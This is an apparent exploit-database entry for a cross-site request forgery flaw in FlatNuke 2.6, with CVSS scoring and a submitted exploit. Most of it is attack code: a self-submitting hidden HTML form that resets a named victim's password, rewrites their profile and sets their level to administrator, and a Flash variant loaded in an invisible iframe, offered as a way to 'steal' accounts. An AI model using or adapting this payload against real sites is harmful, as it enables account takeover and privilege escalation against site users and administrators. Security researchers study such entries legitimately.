FlatNuke, Arbitrary Command Inclusion

Credit: darkbunny91
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-352

CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

/* hackflatnuke.txt * * Tested on 2.6 FlatNuke version (can work on 3 but it has to be modified) * * With this trick you can steal/modifie a flatnuke account by changing the password and all the profile or change your profile and become an admin * * Requirements: - You have to know the nickname of the account u want to steal or change * */ HTML version modifiable <!-- flatnuke.html--> <html> <body> <title>Hack FlatNuke</title> <form method="POST" action="http://www.site.com/path_flatnuke/index.php?mod=none_Login"> <input type="hidden" name="action" value="saveprofile"> <input type="hidden" name="user" value="VICTIM"> <input type="hidden" name="regpass" value="NEW_PASS"> <input type="hidden" name="anag" value="NAME"> <input type="hidden" name="homep" value="VICTIM_SITE"> <input type="hidden" name="prof" value="PROFESSION"> <input type="hidden" name="prov" value="ORIGIN"> <input type="hidden" name="ava" value="blank.png"> <input type="hidden" name="url_avatar" value=""> <input type="hidden" name="firma" value="VICTIM"> <input type="hidden" name="level" value="LEVEL from 1 to 10 P.S. 10=administrator"> </form> <script> document.body.onload = document.forms[0].submit(); </script> </body> </html> <!-- Byez --> Flash versione that you have to export in a swf and import in a iframe exploit.swf var action:String = "saveprofile"; var user:String = "nome_user_che_modifichiamo"; var regpass:String = "nuova_pass"; var anag:String = "nome"; var homep:String = "sito_utente"; var prof:String = "professione"; var prov:String = "provenienza"; var ava:String = "blank.png"; var url_avatar:String = ""; var firma:String = "firma_utente"; var level:String = "livello da 1 a 10 N.B 10=amministartore"; getURL("http://www.sito.com/path_flatnuke/index.php?mod=none_Login", "_self", "POST"); hackflatnuke.html <html> <head> <title>Title</title> </head> <body bgcolor="000000"> <center> <font face="Verdana" size="5" color="#FF0000"> Hack FlatNuke </font> <iframe src="exploit.swf" frameborder="0" height="0" width="0"></iframe> </center> </body> </html>

Vote for this issue:


Thanks for you vote!


Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com


Back to Top